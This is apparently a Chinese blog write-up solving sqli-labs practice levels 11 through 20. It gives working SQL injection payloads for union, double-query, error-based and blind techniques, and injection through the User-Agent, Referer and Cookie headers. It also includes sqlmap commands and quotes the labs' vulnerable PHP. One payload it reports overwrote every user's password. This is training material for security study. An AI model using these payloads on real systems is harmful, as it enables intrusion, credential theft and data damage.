标签:20 name 构造 labs sqli select password concat schema
人生就是一场赌博,怕输的人永远赢不了。
Less-11
手工注入
1.开始为post类型的注入,先加个单引号,报错如下。
构造出SQL语句应该为:select username,password from users where username=' ' ' and password=' 2' limit 0,1; 也即是password字段被单引号包含了' and password=',导致 出现2' limit 0,1; 引号不匹配的情况。下图看起来更直观些。
2.所以,可构造如下语句:' # 。 #把后面的都注释掉,然后在其前面加上自己构造的语句。
3.先用group by 看看有多少列:' group by 1 ,经过测试,共2个字段。
4.下面,开始使用联合查询:-1' union select 1,2 #返回正常,开始构造语句。
5.查数据库名:' union select 1,database() #
6.接下来查表名,构造和Less-1类似:' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #
7.查列名' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
8.查内容:' union select group_concat(username),group_concat(password) from security.users #
OK,已经得到想要的。
用sqlmap注入
1.首先,使用BurpSuite抓包,然后保存抓取到的内容。例如:保存为use.txt,把它放至某个目录下,这里为:F:/temp/use.txt。
2.首先,判断是否存在SQL注入漏洞,python2 sqlmap.py -r F:/temp/use.txt - --batch 得到两个注入点,如图:
3.查询当前数据库python2 sqlmap.py -r F:/temp/use.txt - --batch --current-db
4.查询表::python2 sqlmap.py -r F:/temp/use.txt - --batch -D security --tables
5.剩下的查询和Less-1的用法一样,列-内容,一个一个爆即可。
Less-12
1.加单引号,正常,加双引号,报错:
由图可知,为双引号加括号闭合。
2.构造:") #返回正常,所以用Less-11构造的方法构造语句即可。即") 构造的语句 # 不在赘述。
Less-13
1.加单引号,报错,知道为单引号加括号闭合。
2.以为就这样了,结果采用上面的构造方法无用,看来没那么简单,应该使用双查询注入了,和Less-5的构造基本相同。
3.查数据库,构造如下。') or (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
继续爆其他数据库名,改变limit n,1即可。
4.查表:') or (select 1 from (select count(*),concat((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
同样,改变limit n,1即可。
5.查列名:') or (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) #
同样,改变limit n,1即可。
6.查内容:') or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#
同样,改变limit n,1即可。
Less-14
1.加单引号,正常,加双引号,报错,可知为双引号闭合。
2.应该不会直接是联合查询了,一试,果然还是双查询注入。
3.构造:" 构造语句 # 构造语句和less-13一样。
Less-15
1.加单引号,只有“报错”,应该是要盲注,而且只能布尔型或时间型了(只知道错了没压根不知道错的信息)
2.不管,先把注入句式试出来,用万能句型' or 1=1 or '1'='2,经过尝试,为单引号闭合,此时登录成功。
3.开始布尔型盲注:构造' or 1=(if(substr(version(),1,1)=5,1,0)) or '1'='2,其实就是把上面的1=1改成我们想要的语句,即先看看数据库版面是否为5。因为显示登录成功,所以说明1=(if(substr(version(),1,1)=5,1,0))为true。
4.继续构造:都是把构造好的语句替换1=1,从而查看结果。构造和Less-6差不多,不再赘述。
Less-16
1.还是用万能句型试,最终试出为双引号加括号闭合,即使用") or 1=1 or "1"=("2登录成功。
2.接下来的构造和Less-15一样,如") or 1=(if(substr(version(),1,1)=5,1,0)) or '1'=("2。
Less-17
1.进入页面提示为PASSWORD RESET,即重置密码界面,坑比较多。
2.首先,在user name中尝试了多次,都是让走开,后来一想,确实该走,都提示为重置密码了,还傻傻地在user name试,应该在new password中想办法。后来看了其他大佬的博客后,查看源码才知道原来对user name表单进行了过滤:
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
函数check_input()的作用就是检查用户输入,并将用户输入安全化,其中的mysql_real_escape_string()会在\x00, \n, \r, \, ', " and \x1a这些字符前加入反斜线进行转义,防止注入,而且这个函数也避免了宽字节注入的危险。
3.当然,还不止,new password也不是和之前一样轻易试出注入类型,因为有user name的限制,如果new password不对,那么怎么试都自然是错的。因为看了大佬的解题思路,知道了为单引号闭合,SQL语句为:@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";且知道有用户名为admin(这个用户名一般都有)。所以就直接考虑构造了。
4.首先考虑到不能回显有意义的信息,所以首选前面一直用的双注入查询 构造如下:user name:填admin ,而new password:填' and (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#
剩下的构造不多说,和Less-13一样,一个一个爆就好。
5.在这里,尝试使用一种新的注入方法,基于extractvalue()和updatexml()的报错注入,详情请看: 学习基于extractvalue()和updatexml()的报错注入,同时,下面的注入丢默认user name:填admin
6.先使用updatexml()进行注入,构造为' and updatexml(1,concat('~',(select version())),1)# 获取相应版本:
获取数据库名称:' and updatexml(1,concat('~',(select database())),1)#
获取表名:' and updatexml(1,concat('~',(select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),1)#
改变limit n,1即可获取其他表名。
获取列名:' and updatexml(1,concat('~',(select concat(column_name,';') from information_schema.columns where table_name='emails' limit 0,1)),1)#
同样,改变limit n,1即可。
获取内容:这样,不行' and updatexml(1,concat('~',(select concat(username,';',password) from information_schema.tables where table_name='security' limit 0,1)),1)# 报错如下:
这样:也不行' and updatexml(1,concat('~',(select concat(username,';',password) from security.users limit 0,1)),1)# 报错如下:
这样:发现可以了,但是password成了0,一下子把所有的用户密码都改成了0,后面的可能就有问题了。' or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#
7.使用extractvalue(),和updatexml()十分相似,用法也差不多,甚至看起来跟直观些。构造:' and extractvalue(1,concat('~',(select version())))#
剩下的语句和updatexml()的类似。
Less-18
1.进入后显示Your IP ADDRESS is: ::1,输入常用的注入尝试,都只显示:
看来和上一题一样,都进行了相关的过滤。
2.实在不懂,先看一下源码:
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
这次对两个表单都进行过滤了。
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color="#FFFF00" font="" size="3">';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color="#0000ff" font="" size="3">';
echo 'Your User Agent is: ' .$uagent;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg">';
echo "<br>";
}
else
{
echo '<font color="#0000ff" font="" size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "<br>";
echo "<br>";
echo '<img src="../images/slap.jpg">';
echo "</font>";
}
看到只有用户再登陆成功后才会显示用户的user agent,并且将uagent, ip_address, username插入到了uagents表中。查看一下:
注意到:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
在插入过程中并没有进行过滤,由此可知,可以从uagent下手。本来ip_address也可以成功的,但是源码中显示被注释掉了,回显的只能是用户的user agent
3.构造uagent的内容,使用BurpSuite对提交内容进行抓包,然后再修改相应的User-Agent:
4.易知,只要保证User-Agent:字段内容,即uagent保持单引号闭合,且使用双查询注入或使用extractvalue()或updatexml()构造相应语句即可(因为是在插入语句中,只能通过报错获取我们想要的信息)。
5.构造语句查询数据库名:
构造一:' and updatexml(1,concat('~',(select database())),1) and '1'='1
构造二:' and extractvalue(1,concat('~',(select database()))) and '1'='1
构造三:' and (select 1 from (select count(*),concat(database(),';',floor(rand()*2)) as x from information_schema.tables group by x)as a) and '1'='1
6.其他构造和之前的相似,不再赘述。
Less-19
- 提示为Referer,直接用我们知道的用户名密码都为:
admin的进行尝试,发现:
2.也就是说我们需要将构造语句放入Referer: 尝试:' and extractvalue(1,concat('~',(select database()))) and '1'='1
成功,知道方法就好了。
Less-20
1.提示为Cookie,直接用我们知道的用户名密码都为:admin的进行尝试,发现:
2.Cookie为:uname = admin 所以构造:uname=admin' and extractvalue(1,concat('~',(select database()))) #
3.构造还是一样的。
目前就先到这吧,这部分的题目都是post类型的,后面好像还有,但还是放下一篇吧。当然,文中如有错误或其他更好的语句或解法,还希望诸位不吝赐教,多谢。
参考:
标签:20,name,构造,labs,sqli,select,password,concat,schema 来源: https://www.cnblogs.com/clwsec/p/15679968.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。